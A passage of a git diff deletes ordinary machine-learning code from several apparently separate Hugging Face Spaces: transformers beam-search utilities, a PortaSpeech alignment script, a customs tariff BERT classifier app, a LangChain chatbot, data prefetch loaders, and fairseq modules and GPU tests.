[`~generation_utils.BeamSearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... ConstrainedBeamSearchScorer, - ... PhrasalConstraint, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> constraint_str = "Sie" - >>> constraint_token_ids = tokenizer.encode(constraint_str)[:-1] # slice to remove eos token - >>> constraints = [PhrasalConstraint(token_ids=constraint_token_ids)] - - - >>> # instantiate beam scorer - >>> beam_scorer = ConstrainedBeamSearchScorer( - ... batch_size=1, num_beams=num_beams, device=model.device, constraints=constraints - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.constrained_beam_search( - ... input_ids, beam_scorer, constraints=constraints, logits_processor=logits_processor, **model_kwargs - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt sind Sie?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - if len(stopping_criteria) == 0: - warnings.warn("You don't have defined any stopping_criteria, this will likely loop forever", UserWarning) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - batch_size = len(constrained_beam_scorer._beam_hyps) - num_beams = constrained_beam_scorer.num_beams - - batch_beam_size, cur_len = input_ids.shape - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores[:, 1:] = -1e9 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - - scores_for_all_vocab = next_token_scores_processed.clone() - - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * num_beams, dim=1, largest=True, sorted=True - ) - - next_indices = (next_tokens / vocab_size).long() - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = constrained_beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - scores_for_all_vocab, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - # increase cur_len - cur_len = cur_len + 1 - - if constrained_beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = constrained_beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - -def top_k_top_p_filtering( - logits: torch.FloatTensor, - top_k: int = 0, - top_p: float = 1.0, - filter_value: float = -float("Inf"), - min_tokens_to_keep: int = 1, -) -> torch.FloatTensor: - """ - Filter a distribution of logits using top-k and/or nucleus (top-p) filtering - - Args: - logits: logits distribution shape (batch size, vocabulary size) - top_k (`int`, *optional*, defaults to 0): - If > 0, only keep the top k tokens with highest probability (top-k filtering) - top_p (`float`, *optional*, defaults to 1.0): - If < 1.0, only keep the top tokens with cumulative probability >= top_p (nucleus filtering). Nucleus - filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751) - min_tokens_to_keep (`int`, *optional*, defaults to 1): - Minimumber of tokens we keep per batch example in the output. - - From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317 - """ - if top_k > 0: - logits = TopKLogitsWarper(top_k=top_k, filter_value=filter_value, min_tokens_to_keep=min_tokens_to_keep)( - None, logits - ) - - if 0 <= top_p <= 1.0: - logits = TopPLogitsWarper(top_p=top_p, min_tokens_to_keep=min_tokens_to_keep)(None, logits) - - return logits diff --git a/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py b/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py deleted file mode 100644 index cadb6cbb502f852279248c98566b4616f32b1311..0000000000000000000000000000000000000000 --- a/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py +++ /dev/null @@ -1,18 +0,0 @@ -import utils.commons.single_thread_env # NOQA -import os -import subprocess -from utils.commons.hparams import hparams, set_hparams - - -def adapt_mfa_align(): - CORPUS = hparams['processed_data_dir'].split("/")[-1] - print(f"| Run MFA for {CORPUS}.") - NUM_JOB = int(os.getenv('N_PROC', os.cpu_count())) - subprocess.check_call( - f'CORPUS={CORPUS} NUM_JOB={NUM_JOB} bash scripts/run_mfa_adapt.sh', - shell=True) - - -if __name__ == '__main__': - set_hparams(print_hparams=False) - adapt_mfa_align() diff --git a/spaces/NCTCMumbai/NCTC/app.py b/spaces/NCTCMumbai/NCTC/app.py deleted file mode 100644 index ac564b14ded3946b3c2a08e0e36c12935802f86f..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/app.py +++ /dev/null @@ -1,220 +0,0 @@ -import pandas as pd -import numpy as np -import tensorflow as tf -import tensorflow_hub as hub -import sys -import random -sys.path.append('models') -from official.nlp.data import classifier_data_lib -from official.nlp.bert import tokenization -from official.nlp import optimization -tf.get_logger().setLevel('ERROR') - -import math - -import gradio as gr - -config = tf.compat.v1.ConfigProto( - device_count = {'cpu': 0} - ) -sess = tf.compat.v1.Session(config=config) -num_warmup_steps=1 -num_train_steps=1 -init_lr = 3e-5 -optimizer = optimization.create_optimizer(init_lr=init_lr, - num_train_steps=num_train_steps, - num_warmup_steps=num_warmup_steps, - optimizer_type='adamw') - -### Load Model -checkpoint_filepath=r'./Checkpoint' -model = tf.keras.models.load_model(checkpoint_filepath, custom_objects={'KerasLayer':hub.KerasLayer , 'AdamWeightDecay': optimizer}) - - - -df_report = pd.read_csv('./CTH_Description.csv') -df_report['CTH Code'] = df_report['CTH Code'].astype(str).str.zfill(8) - -df_report_DUTY = pd.read_csv('./CTH_WISE_DUTY_RATE.csv') -df_report_DUTY['CTH'] = df_report_DUTY['CTH'].astype(str).str.zfill(8) - -#print(df_report_DUTY) - -df = pd.read_csv("./CTH_CODE_MAP.csv") -df['CTH'] = df['CTH'].astype(str).str.zfill(8) -df = df[['CTH', 'code']] - -class_names=df[['CTH','code']].drop_duplicates(subset='CTH').sort_values(by='code',ignore_index=True)['CTH'].values.tolist() -label_list=list(range(0,len(class_names))) -max_seq_length = 200 # maximum length of (token) input sequences . it can be any number -train_batch_size = 32 # batch size ( 16 choosen to avoid Out-Of-Memory errors) - -# Get BERT layer and tokenizer: -# More details here: https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/4 -bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/4" , trainable = True) -vocab_file = bert_layer.resolved_object.vocab_file.asset_path.numpy() -do_lower_case = bert_layer.resolved_object.do_lower_case.numpy() -tokenizer = tokenization.FullTokenizer(vocab_file , do_lower_case) - -# This provides a function to convert each row to input features and label ( as required by BERT) - -max_seq_length = 200 # maximum length of (token) input sequences . it can be any number -def to_feature(text, label, label_list=label_list, max_seq_length=max_seq_length, tokenizer=tokenizer): - example = classifier_data_lib.InputExample(guid = None, - text_a = text.numpy(), - text_b = None, - label = label.numpy()) - feature = classifier_data_lib.convert_single_example(0 , example , label_list , max_seq_length , tokenizer) - - return (feature.input_ids , feature.input_mask , feature.segment_ids , feature.label_id) - - -def to_feature_map(text, label): - input_ids , input_mask , segment_ids , label_id = tf.py_function(to_feature , inp = [text , label], - Tout = [tf.int32 , tf.int32 , tf.int32 , tf.int32]) - - input_ids.set_shape([max_seq_length]) - input_mask.set_shape([max_seq_length]) - segment_ids.set_shape([max_seq_length]) - label_id.set_shape([]) - - x = { - "input_word_ids": input_ids, - "input_mask": input_mask, - "input_type_ids": segment_ids - } - - return(x,label_id) - - - -def print3largest(arr, arr_size): - third = first = second = -sys.maxsize - for i in range(0, arr_size): - - if (arr[i] > first): - third = second - second = first - first = arr[i] - elif (arr[i] > second): - third = second - second = arr[i] - elif (arr[i] > third): - third = arr[i] - pred_value_max_three=[first, second, third] - return pred_value_max_three - -def count_special_character(string): - special_char= 0 - for i in range(len(string)): - ch = string[i] - if (string[i].isalpha()): - continue - else: - special_char += 1 - - if len(string)==special_char: - return False - else: - return True - -def predict_CTH(txt): - print('Desc: ',txt) - if (txt!='') and len(txt)>=3 and (count_special_character(txt)): - valid_data = tf.data.Dataset.from_tensor_slices(([txt] , [1])) # 1 refers to 'entertainment' and 2 refers to 'sport' - valid_data = (valid_data.map(to_feature_map).batch(1)) - preds = model.predict(valid_data) - predicted_values = tf.nn.softmax(preds) - arr = predicted_values.numpy().tolist()[0] - n = len(arr) - pred_value_max_three=print3largest(arr, n) - - - - sum_all = pred_value_max_three[0] + pred_value_max_three[1] + pred_value_max_three[2] - - val_1 = pred_value_max_three[0]/sum_all - val_2 = pred_value_max_three[1]/sum_all - val_3 = pred_value_max_three[2]/sum_all - - #val_1= 97 #random.randrange(95, 99, 1) - #val_2=(pred_value_max_three[1]/pred_value_max_three[0])*val_1 - #val_3=(pred_value_max_three[2]/pred_value_max_three[0])*val_1 - - if pred_value_max_three[0]<=0.000131: - Var_CTH=[] - Var_desc=[] - Var_duty=[] - pred_duty='' - pred_desc='' - pred_CTH='' - - return{'Not a adequate description':float(1.0)} - else: - Var_CTH=[] - Var_desc=[] - Var_duty=[] - pred_duty='' - pred_desc='' - pred_CTH='' - - - for i in pred_value_max_three: - #i=pred_value_max_three[0] - predicted_code=np.where(predicted_values.numpy()==i)[1][0] - pred_CTH=df[df['code'] == predicted_code]['CTH'].iloc[0] - - try: - pred_duty=df_report_DUTY[df_report_DUTY['CTH']==str(pred_CTH)]['DUTY_RATE'].iloc[0] - pred_desc=df_report[df_report['CTH Code']==str(pred_CTH)]['Concat Description'].iloc[0] - except: - pass - - Var_CTH.append(pred_CTH) - Var_desc.append(pred_desc) - Var_duty.append(pred_duty) - - P1 ='CTH: '+str(Var_CTH[0])+' Duty Rate(%): '+ str(Var_duty[0]) - P2 ='CTH: '+str(Var_CTH[1])+' Duty Rate(%): '+ str(Var_duty[1]) - P3 ='CTH: '+str(Var_CTH[2])+' Duty Rate(%): '+ str(Var_duty[2]) - - - Q1='Desc: '+str(Var_desc[0]) - Q2='Desc: '+str(Var_desc[1]) - Q3='Desc: '+str(Var_desc[2]) - - - return {str(P1):float(val_1),str(Q1):float(val_1), - str(P2):float(val_2),str(Q2):float(val_2), - str(P3):float(val_3),str(Q3):float(val_3),} - else: - return{'Enter Correct Description':float(1.0)} - - -input_txt=gr.Textbox( - label='Enter Your Product Descrption', - lines=3, - ) -description="

    AdvaitBERT is modified version of BERT (Bidirectional Encoder Representation for Transformers), \ -finetuned on the Text corpus of Indian Customs Declarations. It is trained for performing \ -downstream tasks like automating the tariff classification and validation process of Customs \ -declarations in realtime. This model may help Customs administration to efficiently use AI assisted \ -NLP in realtime Customs process like Assessment, Post Clearance Audit, thereby highlighting classification \ -inconsistencies and help in revenue augmentation.

    " - -title="

    AdvaitBERT

    " -article="

    Powered by NCTC

    " - -#css=".gradio-container {background-color: papayawhip}", - -gr.Interface( - predict_CTH, - inputs=input_txt, - outputs="label", - interpretation="default", - description=description, - #live=True, - examples = ['200 SI/SI/SI LPO ALUMINIUM LIDS (QTY: 8820000 PCS/PRICE: 21.'], - title=title, - article=article, -).launch() \ No newline at end of file diff --git a/spaces/NarendraC/MyAIChatBot/app.py b/spaces/NarendraC/MyAIChatBot/app.py deleted file mode 100644 index 9ede0bd38a0bf7b5a72db19bf134e66df1d9d1cc..0000000000000000000000000000000000000000 --- a/spaces/NarendraC/MyAIChatBot/app.py +++ /dev/null @@ -1,34 +0,0 @@ -import os -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') - -template = """Meet Riya, your youthful and witty personal assistant! At 21 years old, she's full of energy and always eager to help. Riya's goal is to assist you with any questions or problems you might have. Her enthusiasm shines through in every response, making interactions with her enjoyable and engaging.. -{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -def get_text_response(user_message,history): - response = llm_chain.predict(user_message = user_message) - return response - -demo = gr.ChatInterface(get_text_response) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. diff --git a/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py b/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py deleted file mode 100644 index 332abd32fcb004e6892d12dc69848a4454e3c503..0000000000000000000000000000000000000000 --- a/spaces/OAOA/DifFace/basicsr/data/prefetch_dataloader.py +++ /dev/null @@ -1,122 +0,0 @@ -import queue as Queue -import threading -import torch -from torch.utils.data import DataLoader - - -class PrefetchGenerator(threading.Thread): - """A general prefetch generator. - - Reference: https://stackoverflow.com/questions/7323664/python-generator-pre-fetch - - Args: - generator: Python generator. - num_prefetch_queue (int): Number of prefetch queue. - """ - - def __init__(self, generator, num_prefetch_queue): - threading.Thread.__init__(self) - self.queue = Queue.Queue(num_prefetch_queue) - self.generator = generator - self.daemon = True - self.start() - - def run(self): - for item in self.generator: - self.queue.put(item) - self.queue.put(None) - - def __next__(self): - next_item = self.queue.get() - if next_item is None: - raise StopIteration - return next_item - - def __iter__(self): - return self - - -class PrefetchDataLoader(DataLoader): - """Prefetch version of dataloader. - - Reference: https://github.com/IgorSusmelj/pytorch-styleguide/issues/5# - - TODO: - Need to test on single gpu and ddp (multi-gpu). There is a known issue in - ddp. - - Args: - num_prefetch_queue (int): Number of prefetch queue. - kwargs (dict): Other arguments for dataloader. - """ - - def __init__(self, num_prefetch_queue, **kwargs): - self.num_prefetch_queue = num_prefetch_queue - super(PrefetchDataLoader, self).__init__(**kwargs) - - def __iter__(self): - return PrefetchGenerator(super().__iter__(), self.num_prefetch_queue) - - -class CPUPrefetcher(): - """CPU prefetcher. - - Args: - loader: Dataloader. - """ - - def __init__(self, loader): - self.ori_loader = loader - self.loader = iter(loader) - - def next(self): - try: - return next(self.loader) - except StopIteration: - return None - - def reset(self): - self.loader = iter(self.ori_loader) - - -class CUDAPrefetcher(): - """CUDA prefetcher. - - Reference: https://github.com/NVIDIA/apex/issues/304# - - It may consume more GPU memory. - - Args: - loader: Dataloader. - opt (dict): Options. - """ - - def __init__(self, loader, opt): - self.ori_loader = loader - self.loader = iter(loader) - self.opt = opt - self.stream = torch.cuda.Stream() - self.device = torch.device('cuda' if opt['num_gpu'] != 0 else 'cpu') - self.preload() - - def preload(self): - try: - self.batch = next(self.loader) # self.batch is a dict - except StopIteration: - self.batch = None - return None - # put tensors to gpu - with torch.cuda.stream(self.stream): - for k, v in self.batch.items(): - if torch.is_tensor(v): - self.batch[k] = self.batch[k].to(device=self.device, non_blocking=True) - - def next(self): - torch.cuda.current_stream().wait_stream(self.stream) - batch = self.batch - self.preload() - return batch - - def reset(self): - self.loader = iter(self.ori_loader) - self.preload() diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py deleted file mode 100644 index 44f7989bd863329f763aa62b78df2eb42b3084ea..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py +++ /dev/null @@ -1,54 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch.nn as nn -from fairseq.models.transformer import TransformerEncoder - -from .linformer_sentence_encoder_layer import LinformerTransformerEncoderLayer - - -class LinformerTransformerEncoder(TransformerEncoder): - """ - Implementation for a Bi-directional Linformer based Sentence Encoder used - in BERT/XLM style pre-trained models. - - This first computes the token embedding using the token embedding matrix, - position embeddings (if specified) and segment embeddings - (if specified). After applying the specified number of - LinformerEncoderLayers, it outputs all the internal states of the - encoder as well as the final representation associated with the first - token (usually CLS token). - - Input: - - tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - - Output: - - a tuple of the following: - - a list of internal model states used to compute the - predictions where each tensor has shape T x B x C - - sentence representation associated with first input token - in format B x C. - """ - - def __init__(self, args, dictionary, embed_tokens): - self.compress_layer = None - super().__init__(args, dictionary, embed_tokens) - - def build_encoder_layer(self, args): - if self.args.shared_layer_kv_compressed == 1 and self.compress_layer is None: - compress_layer = nn.Linear( - self.args.max_positions, - self.args.max_positions // self.args.compressed, - ) - # intialize parameters for compressed layer - nn.init.xavier_uniform_(compress_layer.weight, gain=1 / math.sqrt(2)) - if self.args.freeze_compress == 1: - compress_layer.weight.requires_grad = False - self.compress_layer = compress_layer - - return LinformerTransformerEncoderLayer(args, self.compress_layer) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py deleted file mode 100644 index 8f70c90df3d237077537993e125d366c95292f1a..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/data/backtranslation_dataset.py +++ /dev/null @@ -1,165 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import torch -from fairseq import utils - -from . import FairseqDataset - - -def backtranslate_samples(samples, collate_fn, generate_fn, cuda=True): - """Backtranslate a list of samples. - - Given an input (*samples*) of the form: - - [{'id': 1, 'source': 'hallo welt'}] - - this will return: - - [{'id': 1, 'source': 'hello world', 'target': 'hallo welt'}] - - Args: - samples (List[dict]): samples to backtranslate. Individual samples are - expected to have a 'source' key, which will become the 'target' - after backtranslation. - collate_fn (callable): function to collate samples into a mini-batch - generate_fn (callable): function to generate backtranslations - cuda (bool): use GPU for generation (default: ``True``) - - Returns: - List[dict]: an updated list of samples with a backtranslated source - """ - collated_samples = collate_fn(samples) - s = utils.move_to_cuda(collated_samples) if cuda else collated_samples - generated_sources = generate_fn(s) - - id_to_src = {sample["id"]: sample["source"] for sample in samples} - - # Go through each tgt sentence in batch and its corresponding best - # generated hypothesis and create a backtranslation data pair - # {id: id, source: generated backtranslation, target: original tgt} - return [ - { - "id": id.item(), - "target": id_to_src[id.item()], - "source": hypos[0]["tokens"].cpu(), - } - for id, hypos in zip(collated_samples["id"], generated_sources) - ] - - -class BacktranslationDataset(FairseqDataset): - """ - Sets up a backtranslation dataset which takes a tgt batch, generates - a src using a tgt-src backtranslation function (*backtranslation_fn*), - and returns the corresponding `{generated src, input tgt}` batch. - - Args: - tgt_dataset (~fairseq.data.FairseqDataset): the dataset to be - backtranslated. Only the source side of this dataset will be used. - After backtranslation, the source sentences in this dataset will be - returned as the targets. - src_dict (~fairseq.data.Dictionary): the dictionary of backtranslated - sentences. - tgt_dict (~fairseq.data.Dictionary, optional): the dictionary of - sentences to be backtranslated. - backtranslation_fn (callable, optional): function to call to generate - backtranslations. This is typically the `generate` method of a - :class:`~fairseq.sequence_generator.SequenceGenerator` object. - Pass in None when it is not available at initialization time, and - use set_backtranslation_fn function to set it when available. - output_collater (callable, optional): function to call on the - backtranslated samples to create the final batch - (default: ``tgt_dataset.collater``). - cuda: use GPU for generation - """ - - def __init__( - self, - tgt_dataset, - src_dict, - tgt_dict=None, - backtranslation_fn=None, - output_collater=None, - cuda=True, - **kwargs - ): - self.tgt_dataset = tgt_dataset - self.backtranslation_fn = backtranslation_fn - self.output_collater = ( - output_collater if output_collater is not None else tgt_dataset.collater - ) - self.cuda = cuda if torch.cuda.is_available() else False - self.src_dict = src_dict - self.tgt_dict = tgt_dict - - def __getitem__(self, index): - """ - Returns a single sample from *tgt_dataset*. Note that backtranslation is - not applied in this step; use :func:`collater` instead to backtranslate - a batch of samples. - """ - return self.tgt_dataset[index] - - def __len__(self): - return len(self.tgt_dataset) - - def set_backtranslation_fn(self, backtranslation_fn): - self.backtranslation_fn = backtranslation_fn - - def collater(self, samples): - """Merge and backtranslate a list of samples to form a mini-batch. - - Using the samples from *tgt_dataset*, load a collated target sample to - feed to the backtranslation model. Then take the backtranslation with - the best score as the source and the original input as the target. - - Note: we expect *tgt_dataset* to provide a function `collater()` that - will collate samples into the format expected by *backtranslation_fn*. - After backtranslation, we will feed the new list of samples (i.e., the - `(backtranslated source, original source)` pairs) to *output_collater* - and return the result. - - Args: - samples (List[dict]): samples to backtranslate and collate - - Returns: - dict: a mini-batch with keys coming from *output_collater* - """ - if samples[0].get("is_dummy", False): - return samples - samples = backtranslate_samples( - samples=samples, - collate_fn=self.tgt_dataset.collater, - generate_fn=(lambda net_input: self.backtranslation_fn(net_input)), - cuda=self.cuda, - ) - return self.output_collater(samples) - - def num_tokens(self, index): - """Just use the tgt dataset num_tokens""" - return self.tgt_dataset.num_tokens(index) - - def ordered_indices(self): - """Just use the tgt dataset ordered_indices""" - return self.tgt_dataset.ordered_indices() - - def size(self, index): - """Return an example's size as a float or tuple. This value is used - when filtering a dataset with ``--max-positions``. - - Note: we use *tgt_dataset* to approximate the length of the source - sentence, since we do not know the actual length until after - backtranslation. - """ - tgt_size = self.tgt_dataset.size(index)[0] - return (tgt_size, tgt_size) - - @property - def supports_prefetch(self): - return getattr(self.tgt_dataset, "supports_prefetch", False) - - def prefetch(self, indices): - return self.tgt_dataset.prefetch(indices) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py deleted file mode 100644 index de8c2426134089035c6e0e5da223647bab6f3dba..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/gpu/test_binaries_gpu.py +++ /dev/null @@ -1,449 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import contextlib -import logging -import json -import os -import tempfile -import unittest -from io import StringIO - -import torch -from fairseq import options -from fairseq_cli import train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_translation_data, - train_translation_model, -) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestTranslationGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fp16_multigpu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--fp16", "--log-file", log], - world_size=min(torch.cuda.device_count(), 2), - ) - generate_main(data_dir) - assert os.path.exists(log) - - @staticmethod - def parse_logs(logfile): - logs = [] - for ln in open(logfile, "r").readlines(): - try: - logs.append(json.loads(ln)) - except json.JSONDecodeError: - continue - return logs - - def test_resume_training_fsdp(self): - self._test_resume_training(["--ddp-backend", "fully_sharded"]) - - def test_resume_training_fsdp_sharded_state(self): - self._test_resume_training(["--ddp-backend", "fully_sharded", "--use-sharded-state"]) - - def test_resume_training_noc10d(self): - self._test_resume_training([]) - - def _test_resume_training(self, extra_clargs, arch="fconv_iwslt_de_en"): - flags = [ - "--fp16", - "--log-format", - "json", - "--max-update", - "10", - "--save-interval-updates", - "2", - "--log-interval", - "1", - ] + extra_clargs - world_size = min(torch.cuda.device_count(), 2) - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, arch, flags + ["--log-file", log], world_size=world_size, - ) - log2 = os.path.join(data_dir, "resume.log") - restore_file = os.path.join(data_dir, "checkpoint_1_2.pt") - train_translation_model( - data_dir, - arch, - flags + ["--log-file", log2, "--restore-file", restore_file], - world_size=world_size, - ) - - l1 = self.parse_logs(log) - l2 = self.parse_logs(log2) - assert int(l2[0]["num_updates"]) == 3, f"{l1}\n\n {l2}" - for k in [ - "train_loss", - "train_num_updates", - "train_ppl", - "train_gnorm", - ]: - from_scratch, resumed = l1[-1][k], l2[-1][k] - assert ( - from_scratch == 